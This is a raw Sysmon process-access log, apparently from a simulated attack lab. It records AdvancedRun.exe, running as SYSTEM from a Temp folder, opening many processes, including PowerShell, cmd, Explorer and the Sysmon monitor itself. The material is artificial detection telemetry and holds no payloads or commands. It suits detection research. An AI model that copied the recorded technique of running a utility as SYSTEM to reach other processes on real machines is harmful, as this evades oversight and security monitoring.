18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 